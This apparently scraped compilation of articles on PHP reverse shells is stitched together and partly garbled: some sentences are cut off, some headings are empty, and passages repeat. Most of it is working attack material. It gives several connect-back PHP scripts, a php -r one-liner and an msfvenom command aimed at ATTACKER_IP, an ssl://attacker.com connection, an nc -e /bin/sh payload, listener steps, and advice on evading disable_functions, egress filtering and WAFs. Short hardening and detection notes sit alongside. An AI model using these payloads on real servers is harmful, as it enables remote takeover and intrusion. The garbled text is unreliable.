This paper examines the mechanisms, execution, and mitigation of PHP-based reverse shells
, a critical technique used in penetration testing and cyberattacks to gain interactive command-line access to web servers.
PHP reverse shells are scripts that, when executed on a target server, initiate an outbound connection to an attacker's machine, effectively bypassing traditional firewall restrictions on inbound traffic. This paper details the technical workflow of these shells, provides common payload examples, and explores defensive strategies for system administrators. 1. Introduction to Reverse Shells reverse shell
(or "connect-back shell") occurs when a compromised system initiates an outbound TCP connection to a listener. Unlike a bind shell
, where the attacker connects to an open port on the target, the reverse shell forces the target to reach out to the attacker. Primary Advantage
: It circumvents Network Address Translation (NAT) and firewalls that typically block incoming connections but permit outgoing traffic on common ports like 80 (HTTP) or 443 (HTTPS). 2. Technical Workflow of a PHP Reverse Shell
The execution of a PHP reverse shell generally follows these five steps: Reverse Shell - Invicti
A PHP reverse shell is a common technique used by security professionals to gain remote command-line access to a server after exploiting a vulnerability. By having the target server initiate an outgoing connection to an attacker-controlled listener, it often bypasses inbound firewall restrictions. Top PHP Reverse Shell Methods
The following are the most widely recognized scripts and one-liners for establishing a PHP reverse shell:
Understanding Reverse Shells in PHP
A reverse shell is a type of shell that allows an attacker to access a victim's computer or server from a remote location. Unlike a traditional shell where the victim connects to the attacker, in a reverse shell, the victim initiates the connection to the attacker. This technique is commonly used in penetration testing and by attackers to bypass network security measures.
Why Use Reverse Shells in PHP?
PHP, being one of the most widely used server-side scripting languages, is often targeted by attackers. A reverse shell in PHP can be particularly useful for attackers to gain access to a server when direct shell access is restricted. For security professionals, understanding how reverse shells work can help in developing better defense mechanisms.
Basic Concept
The basic concept of a reverse shell involves:
PHP Reverse Shell Example
Below is a basic example of a PHP reverse shell. Note: This should only be used for educational purposes or in a controlled environment with permission. reverse shell php top
<?php
$ip = 'your_ip_address'; // IP address of the attacker
$port = 1234; // Listening port
// Create a socket
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock === false)
$error = socket_last_error();
echo "socket_create() failed: $error\n";
else
// Connect to the attacker's listener
$result = socket_connect($sock, $ip, $port);
if ($result === false)
$error = socket_last_error($sock);
echo "socket_connect() failed: $error\n";
socket_close($sock);
else
// Make the shell
$descriptorspec = array(
0 => array("pipe", "r"), // stdin
1 => array("pipe", "w"), // stdout
2 => array("pipe", "w") // stderr
);
$process = proc_open("bash -i", $descriptorspec, $pipes);
if (is_resource($process))
while (true)
$input = socket_read($sock, 1024);
if ($input)
fwrite($pipes[0], $input);
$output = fread($pipes[1], 1024);
socket_write($sock, $output);
$output = fread($pipes[2], 1024);
socket_write($sock, $output);
proc_close($process);
socket_close($sock);
?>
Security Implications
This piece provides a high-level overview of reverse shells in PHP. For detailed technical knowledge, engaging with cybersecurity communities and professional training is recommended.
Reverse Shell in PHP: A Review
A reverse shell is a type of shell that allows an attacker to access a victim's machine from a remote location, often used in penetration testing and malicious activities. In this review, we'll focus on creating a reverse shell using PHP.
What is a Reverse Shell?
A reverse shell is a shell that runs on a victim's machine, connecting back to the attacker's machine, allowing the attacker to execute commands, access files, and perform other malicious activities.
PHP Reverse Shell
To create a reverse shell in PHP, we'll use the following components:
Basic PHP Reverse Shell Code
Here's a basic example of a PHP reverse shell code:
<?php
$host = 'attacker_ip';
$port = 1234;
$sock = fsockopen($host, $port, $errno, $errstr, 30);
if (!$sock)
die('Could not connect to ' . $host . ':' . $port);
stream_set_blocking($sock, 0);
$shell = array(
'stdin' => $sock,
'stdout' => $sock,
'stderr' => $sock
);
proc_open('bash', $shell, $shell);
fclose($sock);
?>
How it Works
attacker_ip) on a specified port (1234) using fsockopen.stream_set_blocking function is used to set the socket to non-blocking mode.proc_open function is used to execute a new process (bash) with the socket as its standard input, output, and error streams.fclose function is used to close the socket.Detection and Prevention
To detect and prevent PHP reverse shells, consider the following:
Top Tools for Detecting and Preventing Reverse Shells
Some top tools for detecting and preventing reverse shells include:
Conclusion
In conclusion, creating a reverse shell in PHP can be a useful tool for penetration testing and legitimate security testing. However, it's essential to use such tools responsibly and with caution. To detect and prevent reverse shells, consider monitoring network traffic, implementing a WAF, keeping software up-to-date, and using secure coding practices.
A PHP Reverse Shell is a piece of code executed on a target server that forces the server to initiate an outgoing connection back to an attacker's machine. This provides the attacker with an interactive command-line interface (shell) on the target system.
In the world of penetration testing and ethical hacking, PHP reverse shells are "top-tier" tools because PHP is the engine behind over 75% of the web. If you can upload or inject code into a web application, a reverse shell is often the final step in gaining full control. How a PHP Reverse Shell Works The process relies on a basic "client-server" reversal:
The Listener: The attacker sets up a machine to wait for an incoming connection (usually using a tool like netcat).
The Payload: The attacker uploads a PHP script to the target web server.
The Execution: The attacker triggers the script (e.g., by visiting http://victim.com in a browser).
The Connection: The PHP script executes a system command that connects back to the attacker's listener, handing over control of the shell. The "Top" PHP Reverse Shell Payloads
Depending on the environment and security restrictions, different payloads are more effective. Here are the most common methods: 1. The Pentestmonkey Classic (The Gold Standard)
The most famous PHP reverse shell was developed by Pentestmonkey. It is a robust, feature-rich script that uses PHP's fsockopen and proc_open functions to create a full duplex connection.
Best for: General-purpose exploitation where you can upload a full file.
Advantage: It handles complex input/output better than simple one-liners. 2. The Interactive One-Liner
If you have a Command Injection vulnerability but can’t upload a full file, a one-liner is essential.
php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' Use code with caution. Copied to clipboard Best for: Fast execution via exec() or system() calls.
How it works: It opens a socket to your IP, then redirects the standard input, output, and error of a shell (/bin/sh) into that socket. 3. Using msfvenom
For professional engagements, the Metasploit Framework's msfvenom tool can generate "top-of-the-line" payloads that are often encoded to bypass basic security filters.
Command: msfvenom -p php/reverse_php LHOST=ATTACKER_IP LPORT=4444 -f raw > shell.php The attacker sets up a listener on a
Advantage: Easily integrated with the Metasploit Meterpreter for advanced post-exploitation. Step-by-Step Implementation Step 1: Set up your Listener
On your local machine (or your Kali Linux box), start a listener to catch the incoming connection: nc -lvnp 4444 Use code with caution. Copied to clipboard
(Translation: Listen, Verbose, No DNS resolution, on Port 4444) Step 2: Prepare the Payload
If using a standard script, you must edit the source code to include your IP address and the port you opened in Step 1. $ip = '10.10.10.5'; // Your IP $port = 4444; // Your Port Use code with caution. Copied to clipboard Step 3: Trigger the Shell
Navigate to the URL where the file is hosted. Your browser will appear to "hang" or "load indefinitely"—this is a good sign! It means the script is currently running and holding the connection open. Step 4: Interact
Check your terminal. You should see a prompt like $. You are now executing commands as the web server user (usually www-data or apache). Bypassing Security Restrictions
Modern servers often have defenses that block these "top" shells. Here is how pros get around them:
Disable Functions: Many admins disable exec(), shell_exec(), and system(). Attackers might use passthru() or popen() as alternatives.
Firewalls (Egress Filtering): If the server blocks outgoing connections on common ports like 4444, try connecting back on port 80 or 443 (HTTPS), as these are almost always open for web traffic.
WAF (Web Application Firewall): If a firewall detects "eval" or "base64" in your code, you may need to obfuscate the script by splitting strings or using hex encoding. Legal and Ethical Warning
Reverse shells are powerful tools used by system administrators for recovery and by security researchers for testing. However, unauthorized access to computer systems is illegal. Always ensure you have explicit, written permission before testing these techniques on any network or server.
In php.ini, modify the disable_functions directive:
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,fsockopen,pfsockopen,stream_socket_client
Note: This breaks legitimate apps (e.g., WordPress updates). Test in staging first.
Using stream_socket_client() with SSL:
$context = stream_context_create(['ssl' => ['verify_peer' => false]]);
$sock = stream_socket_client('ssl://attacker.com:443', $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context);
sh or cmd.exe processes spawned by apache, www-data, or php-fpm.Create a PHP script that will connect back to your machine. Here is a basic example:
<?php
$ip = 'your_attacker_ip_address'; // Change this to your IP
$port = 4444;
$shell = "nc -e /bin/sh $ip $port";
$descriptorspec = array(
0 => array("pipe", "r"), // stdin
1 => array("pipe", "w"), // stdout
2 => array("pipe", "w") // stderr
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process))
die("Couldn't execute shell");
?>
Save this to a file like reverse_shell.php. Make sure to replace your_attacker_ip_address with your actual IP address. PHP Reverse Shell Example Below is a basic
Detect common patterns:
bash -i >& /dev/tcp/fsockopen( followed by a non-local IP.eval().Scan for new .php files in web-accessible directories.
find /var/www/html -name "*.php" -mtime -1 -ls